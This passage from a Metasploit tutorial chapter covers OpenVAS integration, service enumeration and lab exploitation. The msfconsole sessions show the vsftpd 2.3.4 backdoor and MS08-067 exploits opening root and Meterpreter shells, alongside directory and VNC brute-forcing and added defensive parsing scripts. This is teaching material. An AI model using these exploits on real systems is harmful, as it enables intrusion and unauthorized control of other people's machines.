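# Flatten to open services only, which is what the `services` command lists.
def open_services(hosts)
  hosts.flat_map do |h|
    h[:ports].select { |p| p[:state] == 'open' }
             .map { |p| p.merge(address: h[:address]) }
  end
end

# Build `search` queries from fingerprinted services, e.g. "vsftpd 2.3.4".
# Services with no product (a port-table guess, not a probe) yield nothing:
# searching on a bare name like "ssh" returns far too many modules.
def search_terms(hosts)
  open_services(hosts).map do |s|
    next unless s[:product]
    # Keep only the leading version token: "4.7p1 Debian 8ubuntu1" -> "4.7p1"
    ver = s[:version].to_s.split.first
    [s[:product], ver].compact.join(' ')
  end.compact.uniq
end

if __FILE__ == $PROGRAM_NAME
  hosts = parse_nmap_xml(SAMPLE_NMAP_XML)
  open_services(hosts).each do |s|
    puts format('%-15s %5d/%s %-8s %s %s', s[:address], s[:port], s[:proto],
                s[:service], s[:product], s[:version])
  end
  puts "search terms: #{search_terms(hosts).inspect}"
end
```

Run it against a real file with parse_nmap_xml(File.read('nmap.xml')) to see what db_import will record; a port that only appears with method="table" has no product, which is why it produces no search term.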
OpenVAS 

You are already familiar with OpenVAS because you got a glimpse of most 
of its features in previous chapters. However, Metasploit offers capabilities 
to integrate OpenVAS to perform tasks from within the framework. Before 
you can actually perform any of the OpenVAS tasks from MSFconsole, 
you need to load the OpenVAS plug-in by executing the command load 
openvas, as shown in Figure 3-22. 

msf > load openvas 
[*] Welcome to OpenVAS integration by kost and averagesecurityguy 
[*] 
[*] OpenVAS integration requires a database connection. Once the 
[*] database is ready, connect to the OpenVAS server using openvas_connect. 
[*] For additional commands use openvas_help. 
[*] 
[*] Successfully loaded plugin: OpenVAS 
msf > 

Figure 3-22. Loading the OpenVAS plug-in into MSFconsole 

Once OpenVAS is loaded in MSFconsole, there are numerous tasks 
you can perform. You can use the openvas_help command, as shown in 
Figure 3-23, to list all the possible tasks. 
msf > openvas_help 
[*] openvas_help                  Display this help 
[*] openvas_debug                 Enable/Disable debugging 
[*] openvas_version               Display the version of the OpenVAS server 
[*] 
[*] CONNECTION 
[*] ========== 
[*] openvas_connect               Connects to OpenVAS 
[*] openvas_disconnect            Disconnects from OpenVAS 
[*] 
[*] TARGETS 
[*] ======= 
[*] openvas_target_create         Create target 
[*] openvas_target_delete         Deletes target specified by ID 
[*] openvas_target_list           Lists targets 
[*] 
[*] TASKS 
[*] ===== 
[*] openvas_task_create           Create task 
[*] openvas_task_delete           Delete a task and all associated reports 
[*] openvas_task_list             Lists tasks 
[*] openvas_task_start            Starts task specified by ID 
[*] openvas_task_stop             Stops task specified by ID 
[*] openvas_task_pause            Pauses task specified by ID 
[*] openvas_task_resume           Resumes task specified by ID 
[*] openvas_task_resume_or_start  Resumes or starts task specified by ID 
[*] 
[*] CONFIGS 
[*] ======= 
[*] openvas_config_list           Lists scan configurations 
[*] 
[*] FORMATS 
[*] ======= 
[*] openvas_format_list           Lists available report formats 
[*] 
[*] REPORTS 
[*] ======= 
[*] openvas_report_list           Lists available reports 
[*] openvas_report_delete         Delete a report specified by ID 
[*] openvas_report_import         Imports an OpenVAS report specified by ID 
[*] openvas_report_download       Downloads an OpenVAS report specified by ID 
msf > 

Figure 3-23. The output of the openvas_help command in 
MSFconsole 

The OpenVAS server may be running locally or on some remote 
system. You need to connect to the OpenVAS server using the command 
openvas_connect, as shown in Figure 3-24. You need to supply a 
username, password, OpenVAS server IP, and port as parameters to this 
command. The trailing ok in the figure acknowledges the plug-in's warning 
that it does not verify the server's SSL certificate, so the connection 
could be intercepted on an untrusted network. Also note that because the 
password is given on the command line, it is recorded by the history 
command, saved by makerc, and written to any open spool file; clear or 
protect those files after the engagement. 
msf > openvas_connect admin 439ceaf3-928a-4bc0-aa12-59938cfb8444 127.0.0.1 9390 ok 
[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username admin... 
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201: warning: Object#timeout is deprecated, use Timeout.timeout instead. 
[+] OpenVAS connection successful 
msf > 

Figure 3-24. Connecting to the OpenVAS server using the openvas_ 
connect command in MSFconsole 


Once the connection to the OpenVAS server is successful, you need 
to create a new target using the command openvas_target_create, as 
shown in Figure 3-25. You need to supply the target name, target IP address, 
and a comment as parameters to this command. The command prints the ID 
of the new target and then lists all targets; keep that ID, because the 
task you create next refers to the target by ID, not by name. (The Ruby 
deprecation warning printed by the openvas-omp gem after every command 
is omitted from the following figures.) 

msf > openvas_target_create 
[*] Usage: openvas_target_create <name> <hosts> <comment> 
msf > openvas_target_create test 192.168.25.129 test-scan 
[*] 87bbf542-33fd-45e6-b2f6-f8b32b9f4170 
[+] OpenVAS list of targets 

ID                                    Name                                            Hosts           Max Hosts  In Use  Comment 
--                                    ----                                            -----           ---------  ------  ------- 
4e8c69af-c384-4d6d-9932-750d86021597  Target for immediate scan of IP 192.168.25.129  192.168.25.129  1          1 
87bbf542-33fd-45e6-b2f6-f8b32b9f4170  test                                            192.168.25.129  1          0       test-scan 
8b985290-49c1-4475-aee4-67fbdf217da3  Target for immediate scan of IP 192.168.25.132  192.168.25.132  1          1 
be89d561-0f1b-4713-9339-fe7e123c5e0c  Target for immediate scan of IP 192.168.25.128  192.168.25.128  1          1 

msf > 

Figure 3-25. Creating a new target for an OpenVAS scan using the 
openvas_target_create command in MSFconsole 

After creating a new target, you need to choose a scan configuration 
(scan profile). List the available configurations and their IDs with the 
command openvas_config_list, as shown in Figure 3-26. 
msf > openvas_config_list 
[+] OpenVAS list of configs 

ID                                    Name 
--                                    ---- 
085569ce-73ed-11df-83c3-002264764cea  empty 
2d3f051c-55ba-11e3-bf43-406186ea4fc5  Host Discovery 
698f691e-7489-11df-9d8c-002264764cea  Full and fast ultimate 
708f25c4-7489-11df-8094-002264764cea  Full and very deep 
74db13d6-7489-11df-91b9-002264764cea  Full and very deep ultimate 
8715c877-47a0-438d-98a3-27c7a6ab2196  Discovery 
bbca7412-a950-11e3-9109-406186ea4fc5  System Discovery 
daba56c8-73ec-11df-a475-002264764cea  Full and fast 

msf > 

Figure 3-26. The output of the openvas_config_list command in 
MSFconsole 


Once you have selected the scan profile, it's time to create a scan task. 
The command openvas_task_create can be used to create a new task, as 
shown in Figure 3-27. You need to supply the scan name, a comment, 
the configuration ID (from openvas_config_list), and the target ID (from 
openvas_target_create) as parameters to this command. Here the "Full and 
fast" configuration is paired with the test target created above. 

msf > openvas_task_create 
[*] Usage: openvas_task_create <name> <comment> <config_id> <target_id> 
msf > openvas_task_create test test-scan daba56c8-73ec-11df-a475-002264764cea 87bbf542-33fd-45e6-b2f6-f8b32b9f4170 
[*] ca0b6a89-be39-4cf2-87fd-289776af2be5 
[+] OpenVAS list of tasks 

ID                                    Name                                 Comment    Status  Progress 
--                                    ----                                 -------    ------  -------- 
577ce4cd-2398-47dc-bbd0-20b209585404  Immediate scan of IP 192.168.25.132             Done    -1 
865193b6-23ee-42f4-9ef2-9aee031697a2  Immediate scan of IP 192.168.25.128             Done    -1 
a25ad62d-3e33-4b1d-9869-d291265b5fc3  Immediate scan of IP 192.168.25.129             Done    -1 
ca0b6a89-be39-4cf2-87fd-289776af2be5  test                                 test-scan  New     -1 

msf > 

Figure 3-27. Creating a new OpenVAS scan task using the command 
openvas_task_create in MSFconsole 


Now that the scan task has been created, you can initiate the scan 
using the command openvas_task_start, as shown in Figure 3-28. You 
need to supply the task ID as a parameter to this command. 
msf > openvas_task_start ca0b6a89-be39-4cf2-87fd-289776af2be5 
[*] <X><authenticate_response status='200' status_text='OK'><role>Admin</role><timezone>UTC</timezone><severity>nist</severity></authenticate_response><start_task_response status='202' status_text='OK, request submitted'><report_id>204e59af-7fb5-4b9e-9906-e64be1f2a665</report_id></start_task_response></X> 
msf > openvas_task_list 
[+] OpenVAS list of tasks 

ID                                    Name                                 Comment    Status   Progress 
--                                    ----                                 -------    ------   -------- 
577ce4cd-2398-47dc-bbd0-20b209585404  Immediate scan of IP 192.168.25.132             Done     -1 
865193b6-23ee-42f4-9ef2-9aee031697a2  Immediate scan of IP 192.168.25.128             Done     -1 
a25ad62d-3e33-4b1d-9869-d291265b5fc3  Immediate scan of IP 192.168.25.129             Done     -1 
ca0b6a89-be39-4cf2-87fd-289776af2be5  test                                 test-scan  Running  1 

msf > 

Figure 3-28. Running the newly created OpenVAS task using the 
openvas_task_start command in MSFconsole 


It will take a while before the scan completes. The openvas_task_list 
output in Figure 3-28 shows the task moving from New to Running, and the 
report_id inside the raw start_task_response is the ID of the report this 
run will produce. Once the scan is complete, you can view the reports 
using the command openvas_report_list, as shown in Figure 3-29. 


msf > openvas_report_list 
[+] OpenVAS list of reports 

ID                                    Task Name                            Start Time            Stop Time 
--                                    ---------                            ----------            --------- 
204e59af-7fb5-4b9e-9906-e64be1f2a665  test                                 2018-09-24T06:34:53Z  2018-09-24T07:09:07Z 
3973274e-48a8-4bed-a485-132d97cbedcf  Immediate scan of IP 192.168.25.128  2018-09-06T04:33:09Z  2018-09-06T04:45:37Z 
7573405-cb40-4cca-9ac3-ed356d5b6500   Immediate scan of IP 192.168.25.132  2018-09-06T04:47:30Z  2018-09-06T05:00:34Z 
fb9bf519-6f4f-4e07-9125-7bb2041d9877  Immediate scan of IP 192.168.25.129  2018-08-02T06:22:55Z  2018-08-02T06:47:01Z 

msf > 

Figure 3-29. Listing the OpenVAS reports using the openvas_report_ 
list command in MSFconsole 

Now that the scan is complete and the report is ready, you can 
download the report using the openvas_report_download command, as 
shown in Figure 3-30. You need to supply the report ID, report format, 
output path, and report name as parameters to this command. 

[Only the tail of the command survived in the source:] ...e64be112a665 pdf /root/Desktop/ test.pdf 

Figure 3-30. Saving the OpenVAS report using the openvas_report_ 
download command in MSFconsole 


Scanning and Exploiting Services with 
Metasploit Auxiliaries 


Metasploit offers a wide choice of exploits and auxiliary modules for 
scanning, enumerating, and exploiting various services and protocols. 
This section covers some of the auxiliary modules and exploits targeting 
commonly used protocols. 


DNS 


In the previous chapter, you learned how NMAP can be used for 
enumerating a DNS service. Metasploit also has several auxiliary modules 
that can be used for DNS reconnaissance. 

Figure 3-31 shows the use of the /auxiliary/gather/enum_dns 
module. All you need to do is configure the target domain and run the 
module. It returns the associated DNS servers as a result. 
msf > use auxiliary/gather/enum_dns 
msf auxiliary(gather/enum_dns) > show options 

Module options (auxiliary/gather/enum_dns): 

   Name         Current Setting                                              Required  Description 
   DOMAIN                                                                    yes       The target domain 
   ENUM_A       true                                                         yes       Enumerate DNS A record 
   ENUM_AXFR    true                                                         yes       Initiate a zone transfer against each NS record 
   ENUM_BRT     false                                                        yes       Brute force subdomains and hostnames via the supplied wordlist 
   ENUM_CNAME   true                                                         yes       Enumerate DNS CNAME record 
   ENUM_MX      true                                                         yes       Enumerate DNS MX record 
   ENUM_NS      true                                                         yes       Enumerate DNS NS record 
   ENUM_RVL     false                                                        yes       Reverse lookup a range of IP addresses 
   ENUM_SOA     true                                                         yes       Enumerate DNS SOA record 
   ENUM_SRV     true                                                         yes       Enumerate the most common SRV records 
   ENUM_TLD     false                                                        yes       Perform a TLD expansion by replacing the TLD with the IANA TLD list 
   ENUM_TXT     true                                                         yes       Enumerate DNS TXT record 
   IPRANGE                                                                   no        The target address range or CIDR identifier 
   NS                                                                        no        Specify the nameserver to use for queries (default is system DNS) 
   STOP_WLCARD  false                                                        yes       Stops bruteforce enumeration if wildcard resolution is detected 
   THREADS      1                                                            no        Threads for ENUM_BRT 
   WORDLIST     /usr/share/metasploit-framework/data/wordlists/namelist.txt  no        Wordlist of subdomains 

msf auxiliary(gather/enum_dns) > set DOMAIN megacorpone.com 
DOMAIN => megacorpone.com 
msf auxiliary(gather/enum_dns) > run 

W, [2018-09-24T18:01:19.563098 #14445]  WARN -- : Nameserver 192.168.25.2 not responding within UDP timeout, trying next one 
F, [2018-09-24T18:01:19.563455 #14445] FATAL -- : No response from nameservers list: aborting 
[*] querying DNS NS records for megacorpone.com 
[+] megacorpone.com NS: ns3.megacorpone.com. 
[+] megacorpone.com NS: ns2.megacorpone.com. 


Figure 3-31. The use of the auxiliary module enum_dns 
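Every module in this chapter follows the same routine: show options, fill in the required settings, run. The following Python script is an added example, not code from this book or from the Metasploit Framework: it parses the options table that msfconsole prints (the layout of Figure 3-31 and the later figures) by the column positions of the header line, so an empty Current Setting cell such as RHOSTS does not shift the Required and Description columns, and it reports which required options are still unset before run is issued. The sample table is constructed from the http_version options shown later in this chapter (Figure 3-34); the ModuleOption class and the helper names are this example's own.

```python
"""Parse an msfconsole 'show options' table and report unset required options.

Added example; the table text is constructed to mirror the layout msfconsole
prints in the figures of this chapter. Not Metasploit Framework code.
"""
from dataclasses import dataclass

# Constructed sample (the http_version options of Figure 3-34). Columns are
# aligned under the header exactly as msfconsole does it; RHOSTS has an empty
# 'Current Setting' cell, which is the case a naive whitespace split gets wrong.
_ROWS = [
    ("Proxies", "", "no", "A proxy chain of format type:host:port[,type:host:port][...]"),
    ("RHOSTS", "", "yes", "The target address range or CIDR identifier"),
    ("RPORT", "80", "yes", "The target port (TCP)"),
    ("SSL", "false", "no", "Negotiate SSL/TLS for outgoing connections"),
    ("THREADS", "1", "yes", "The number of concurrent threads"),
    ("VHOST", "", "no", "HTTP server virtual host"),
]
_FMT = "   {:<9}{:<17}{:<10}{}"
SAMPLE_SHOW_OPTIONS = "\n".join(
    ["Module options (auxiliary/scanner/http/http_version):", "",
     _FMT.format("Name", "Current Setting", "Required", "Description"),
     _FMT.format("----", "---------------", "--------", "-----------")]
    + [_FMT.format(*row) for row in _ROWS]) + "\n"


@dataclass
class ModuleOption:
    name: str
    current: str
    required: bool
    description: str


def parse_show_options(text):
    """Return {name: ModuleOption} parsed from a 'show options' dump.

    Column boundaries come from the header line, so an empty 'Current
    Setting' cell is read as empty instead of pulling the Required and
    Description cells one column to the left.
    """
    lines = text.splitlines()
    try:
        hdr_idx = next(i for i, line in enumerate(lines)
                       if "Current Setting" in line and "Required" in line)
    except StopIteration:
        raise ValueError("no options header found") from None
    header = lines[hdr_idx]
    col_name = header.index("Name")
    col_current = header.index("Current Setting")
    col_required = header.index("Required")
    col_desc = header.index("Description")

    options = {}
    for line in lines[hdr_idx + 1:]:
        if not line.strip():
            if options:
                break              # first blank line after the rows ends the table
            continue
        if set(line.strip()) <= set("- "):
            continue               # the '----' underline row
        padded = line.ljust(col_desc)   # short rows must still slice safely
        name = padded[col_name:col_current].strip()
        current = padded[col_current:col_required].strip()
        required = padded[col_required:col_desc].strip().lower() == "yes"
        description = padded[col_desc:].strip()
        options[name] = ModuleOption(name, current, required, description)
    return options


def missing_required(options):
    """Names of required options with no value; if non-empty, 'run' will refuse to start."""
    return sorted(name for name, opt in options.items()
                  if opt.required and not opt.current)


def set_option(options, name, value):
    """Mirror msfconsole's 'set NAME VALUE' on the parsed table and echo its reply."""
    if name not in options:
        raise KeyError(f"unknown option {name}")
    options[name].current = value
    return f"{name} => {value}"


if __name__ == "__main__":
    opts = parse_show_options(SAMPLE_SHOW_OPTIONS)
    print("unset required options:", missing_required(opts))
    print(set_option(opts, "RHOSTS", "192.168.25.129"))
    print("unset required options:", missing_required(opts))
```

The same parser works on the output of any module's show options, including the exploit modules later in the chapter, because the header line is what defines the columns.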


FTP 


Let’s assume that when conducting an NMAP scan you found that your target 
is running an FTP server on port 21 and the server version is vsftpd 2.3.4. 

You can use the search function to find out whether Metasploit has 
any exploits for the vsftpd server, as shown in Figure 3-32. 


msf > search vsftpd 
[!] Module database cache not built yet, using slow search 

Matching Modules 

   Name                                  Disclosure Date  Rank       Description 
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution 


Figure 3-32. The output of the search for the vsftpd exploit 


Here you'll use the exploit exploit/unix/ftp/vsftpd_234_backdoor to exploit 
the vulnerable FTP server. You configure the target IP address as the 
RHOST variable and then run the exploit, as shown in Figure 3-33. 
msf > use exploit/unix/ftp/vsftpd_234_backdoor 
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor): 

   Name   Current Setting  Required  Description 
   RHOST                   yes       The target address 
   RPORT  21               yes       The target port (TCP) 

Exploit target: 

   Id  Name 
   0   Automatic 

msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.25.129 
RHOST => 192.168.25.129 
msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit 

[*] 192.168.25.129:21 - Banner: 220 (vsFTPd 2.3.4) 
[*] 192.168.25.129:21 - USER: 331 Please specify the password. 
[+] 192.168.25.129:21 - Backdoor service has been spawned, handling... 
[+] 192.168.25.129:21 - UID: uid=0(root) gid=0(root) 
[*] Found shell. 
[*] Command shell session 1 opened (192.168.25.128:38095 -> 192.168.25.129:6200) at 2018-09-26 15:26:35 +0530 

uname -a 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
whoami 


Figure 3-33. Successful exploitation of target using the vsftpd_234_ 
backdoor exploit 


The exploit is successful, and you get command shell access to the 
target system. 


HTTP 


The Hypertext Transfer Protocol (HTTP) is one of the most commonly 
found services on hosts. Metasploit has numerous exploits and auxiliaries 
to enumerate and exploit an HTTP service. The auxiliary module 
auxiliary/scanner/http/http_version, as shown in Figure 3-34, 
enumerates the HTTP server version. Based on the exact server version, 
you can plan further exploitation more precisely. 


msf > use auxiliary/scanner/http/http_version 
msf auxiliary(scanner/http/http_version) > show options 

Module options (auxiliary/scanner/http/http_version): 

   Name     Current Setting  Required  Description 
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...] 
   RHOSTS                    yes       The target address range or CIDR identifier 
   RPORT    80               yes       The target port (TCP) 
   SSL      false            no        Negotiate SSL/TLS for outgoing connections 
   THREADS  1                yes       The number of concurrent threads 
   VHOST                     no        HTTP server virtual host 

msf auxiliary(scanner/http/http_version) > set RHOSTS 192.168.25.129 
RHOSTS => 192.168.25.129 
msf auxiliary(scanner/http/http_version) > run 

[+] 192.168.25.129:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 ) 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


Figure 3-34. The output of the auxiliary module http_version 


Many times a web server has directories that are not directly exposed 
and may contain interesting information. Metasploit has an auxiliary 
module called auxiliary/scanner/http/brute_dirs that scans for such 
directories, as shown in Figure 3-35. 


msf > use auxiliary/scanner/http/brute_dirs 
msf auxiliary(scanner/http/brute_dirs) > show options 

Module options (auxiliary/scanner/http/brute_dirs): 

   Name     Current Setting  Required  Description 
   FORMAT   a,aa,aaa         yes       The expected directory format (a alpha, d digit, A upperalpha) 
   PATH     /                yes       The path to identify directories 
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...] 
   RHOSTS                    yes       The target address range or CIDR identifier 
   RPORT    80               yes       The target port (TCP) 
   SSL      false            no        Negotiate SSL/TLS for outgoing connections 
   THREADS  1                yes       The number of concurrent threads 
   VHOST                     no        HTTP server virtual host 

msf auxiliary(scanner/http/brute_dirs) > set RHOSTS 192.168.25.129 
RHOSTS => 192.168.25.129 
msf auxiliary(scanner/http/brute_dirs) > run 

[*] Using code '404' as not found 
[+] Found http://192.168.25.129:80/dav/ 200 
[+] Found http://192.168.25.129:80/doc/ 200 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


Figure 3-35. The output of the auxiliary module brute_dirs 
RDP 


The Remote Desktop Protocol (RDP) is a proprietary protocol developed 
by Microsoft for remote graphical administration. If your target is a 
Windows-based system, then you can execute an auxiliary module called 
auxiliary/scanner/rdp/ms12_020_check, as shown in Figure 3-36. It 
checks whether the target is vulnerable to the MS12-020 vulnerability. 
You can find out more details about this vulnerability at 
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020. 


msf > use auxiliary/scanner/rdp/ms12_020_check 
msf auxiliary(scanner/rdp/ms12_020_check) > show options 

Module options (auxiliary/scanner/rdp/ms12_020_check): 

   Name     Current Setting  Required  Description 
   RHOSTS                    yes       The target address range or CIDR identifier 
   RPORT    3389             yes       Remote port running RDP (TCP) 
   THREADS  1                yes       The number of concurrent threads 

msf auxiliary(scanner/rdp/ms12_020_check) > set RHOSTS 192.168.25.130 
RHOSTS => 192.168.25.130 
msf auxiliary(scanner/rdp/ms12_020_check) > run 

[+] 192.168.25.130:3389 - 192.168.25.130:3389 - The target is vulnerable. 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


Figure 3-36. The output of the auxiliary module ms12_020_check 


SMB 


In the previous chapter, you used NMAP to enumerate SMB. Metasploit 
has lots of useful auxiliary modules for the enumeration and exploitation 
of SMB. 

A simple search for SMB modules fetches results, as shown in 
Figure 3-37. 
Figure 3-37. The output of the search query for SMB-related modules 
and exploits 


You can use one of the auxiliary modules called auxiliary/scanner/ 
smb/smb_enumshares, as shown in Figure 3-38. You need to set the value of 
the RHOSTS variable to the target IP address. The module returns a list 
of the shares on the target system. 


msf > use auxiliary/scanner/smb/smb_enumshares 
msf auxiliary(scanner/smb/smb_enumshares) > show options 

Module options (auxiliary/scanner/smb/smb_enumshares): 

   Name            Current Setting  Required  Description 
   LogSpider       3                no        0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3) 
   MaxDepth        999              yes       Max number of subdirectories to spider 
   RHOSTS                           yes       The target address range or CIDR identifier 
   SMBDomain       .                no        The Windows domain to use for authentication 
   SMBPass                          no        The password for the specified username 
   SMBUser                          no        The username to authenticate as 
   ShowFiles       false            yes       Show detailed information when spidering 
   SpiderProfiles  true             no        Spider only user profiles when share = C$ 
   SpiderShares    false            no        Spider shares recursively 
   THREADS         1                yes       The number of concurrent threads 

msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.25.130 
RHOSTS => 192.168.25.130 
msf auxiliary(scanner/smb/smb_enumshares) > run 

[-] 192.168.25.130:139 - Login Failed: The SMB server did not reply to our request 
[*] 192.168.25.130:445 - Windows XP Service Pack 3 (English) 
[+] 192.168.25.130:445 - IPC$ - (I) Remote IPC 
[+] 192.168.25.130:445 - SharedDocs - (DS) 
[+] 192.168.25.130:445 - ADMIN$ - (DS) Remote Admin 
[+] 192.168.25.130:445 - C$ - (DS) Default share 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


Figure 3-38. The output of the auxiliary module smb_enumshares 
Another popular SMB exploit targets the MS08-067 netapi vulnerability. 
You can use the exploit exploit/windows/smb/ms08_067_netapi, as 
shown in Figure 3-39. You need to set the value of the variable RHOST to 
the IP address of the target system. If the exploit runs successfully, you are 
presented with the Meterpreter shell. 


msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi): 

   Name     Current Setting  Required  Description 
   RHOST                     yes       The target address 
   RPORT    445              yes       The SMB service port (TCP) 
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 

Exploit target: 

   Id  Name 
   0   Automatic Targeting 

msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.25.130 
RHOST => 192.168.25.130 
msf exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.25.128:4444 
[*] 192.168.25.130:445 - Automatically detecting the target... 
[*] 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Unknown 
[*] 192.168.25.130:445 - We could not detect the language pack, defaulting to English 
[*] 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 
[*] 192.168.25.130:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (179779 bytes) to 192.168.25.130 
[*] Meterpreter session 1 opened (192.168.25.128:4444 -> 192.168.25.130:1085) at 2018-09-26 20:49:18 +0530 

meterpreter > sysinfo 
Computer        : SAGAR-C51B4AADE 
OS              : Windows XP (Build 2600, Service Pack 3). 
Architecture    : x86 
System Language : en_US 
Domain          : MSHOME 
Logged On Users : 1 
Meterpreter     : x86/windows 


Figure 3-39. Successful exploitation of the target system using the 
exploit ms08_067_netapi 


SSH 


Secure Shell (SSH) is one of the commonly used protocols for secure 
remote administration. Metasploit has many auxiliary modules for SSH 
enumeration. You can use the auxiliary module auxiliary/scanner/ssh/ 
ssh_version, as shown in Figure 3-40. You need to set the value of the 
RHOSTS variable to that of the target. The module executes and returns the 
exact SSH version that is running on the target. This information can be 
used in further exploitation. 


msf > use auxiliary/scanner/ssh/ssh_version 
msf auxiliary(scanner/ssh/ssh_version) > show options 

Module options (auxiliary/scanner/ssh/ssh_version): 

   Name     Current Setting  Required  Description 
   RHOSTS                    yes       The target address range or CIDR identifier 
   RPORT    22               yes       The target port (TCP) 
   THREADS  1                yes       The number of concurrent threads 
   TIMEOUT  30               yes       Timeout for the SSH probe 

msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.25.129 
RHOSTS => 192.168.25.129 
msf auxiliary(scanner/ssh/ssh_version) > run 

[+] 192.168.25.129:22 SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 ( service.version=4.7p1 openssh.comment=Debian-8ubuntu1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=8.04 service.protocol=ssh fingerprint_db=ssh.banner ) 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


Figure 3-40. The output of the auxiliary module ssh_version 
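The FTP, HTTP, and SSH sections above all turn on the same fact: the version string a service announces in its banner decides what can be done to it, so the same banners that tell an attacker where to look tell a defender what to patch first. The Python script below is an added example, not code from this book, from Metasploit, or from NMAP: it extracts product and version from the three banner shapes shown in Figures 3-33, 3-34, and 3-40, flags the vsftpd 2.3.4 release that this chapter exploits, and reports anything older than an assumed organizational baseline. The banner records, the record format (host:port, a tab, then the banner), and the baseline versions in MIN_VERSION are constructed for this example and are not advisories.

```python
"""Turn service banners into a version inventory and flag what needs attention.

Added example, not from the book, Metasploit or NMAP. Banner strings are
constructed from what Figures 3-33, 3-34 and 3-40 show; the baseline versions
are assumptions for the example, not vulnerability advisories.
"""
import re
from typing import NamedTuple


class Service(NamedTuple):
    host: str
    port: int
    product: str
    version: tuple        # numeric components only, e.g. (4, 7) for "4.7p1"
    banner: str


# (regex, product name) pairs for the banner shapes seen in this chapter
BANNER_PATTERNS = [
    (re.compile(r"\(vsFTPd ([\w.]+)\)"), "vsftpd"),    # "220 (vsFTPd 2.3.4)"
    (re.compile(r"\bApache/([\w.]+)"), "Apache"),      # "Apache/2.2.8 (Ubuntu) ..."
    (re.compile(r"OpenSSH_([\w.]+)"), "OpenSSH"),      # "SSH-2.0-OpenSSH_4.7p1 ..."
]

# Exact releases known to be trouble: vsftpd 2.3.4 is the backdoored release
# that exploit/unix/ftp/vsftpd_234_backdoor abuses earlier in this chapter.
KNOWN_BAD = {
    ("vsftpd", (2, 3, 4)): "backdoored vsftpd 2.3.4 release; replace immediately",
}

# Assumed organizational baseline (constructed for this example): anything
# older is reported as below baseline, not as a specific vulnerability.
MIN_VERSION = {"Apache": (2, 4), "OpenSSH": (7, 4)}


def version_tuple(text):
    """'4.7p1' -> (4, 7): keeps the leading digits of each dotted component."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def parse_banner(host, port, banner):
    """Return a Service for a recognised banner, or None if nothing matches."""
    for pattern, product in BANNER_PATTERNS:
        m = pattern.search(banner)
        if m:
            return Service(host, port, product, version_tuple(m.group(1)), banner)
    return None


def assess(service):
    """Findings for one service; an empty list means nothing to report."""
    findings = []
    note = KNOWN_BAD.get((service.product, service.version))
    if note:
        findings.append(note)
    floor = MIN_VERSION.get(service.product)
    if floor and service.version < floor:
        findings.append("%s %s is below baseline %s" % (
            service.product,
            ".".join(map(str, service.version)),
            ".".join(map(str, floor))))
    return findings


def inventory(records):
    """records: 'host:port<TAB>banner' strings (constructed format).

    Returns {(host, port): (product, version, findings)}. Banners that match
    no pattern are left out so they can be reviewed by hand.
    """
    report = {}
    for record in records:
        endpoint, banner = record.split("\t", 1)
        host, port = endpoint.rsplit(":", 1)
        svc = parse_banner(host, int(port), banner)
        if svc is not None:
            report[(host, svc.port)] = (svc.product, svc.version, assess(svc))
    return report


# Constructed sample records built from the banners shown in this chapter.
SAMPLE_BANNERS = [
    "192.168.25.129:21\t220 (vsFTPd 2.3.4)",
    "192.168.25.129:80\tApache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )",
    "192.168.25.129:22\tSSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1",
    "192.168.25.130:3389\tno textual banner",
]

if __name__ == "__main__":
    for (host, port), (product, version, findings) in sorted(inventory(SAMPLE_BANNERS).items()):
        print(host, port, product, ".".join(map(str, version)), findings or "ok")
```

Version comparison is done on tuples of integers rather than on strings, so that 2.2.8 sorts before 2.4 and a suffix such as p1 or -8ubuntu1 does not break the comparison.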


VNC 


Virtual Network Computing (VNC) is a protocol used for graphical remote 
administration. Metasploit has several modules for the enumeration and 
exploitation of VNC. Figure 3-41 shows the use of the auxiliary/scanner/ 
vnc/vnc_login module. You need to set the value of the RHOST variable to 
the IP address of your target system. The module uses a built-in password 
dictionary and attempts a brute-force attack. Once the module completes 
execution, it gives you the VNC password that you can use to log in. 


Figure 3-41. The output of the auxiliary module vnc_login 


Meterpreter Basics 


Meterpreter is the abbreviation for the Metasploit Interpreter. It is 
an advanced Metasploit payload that uses in-memory DLL injection 
techniques to interact with a target system. It offers several useful post- 
exploitation tools and utilities. 


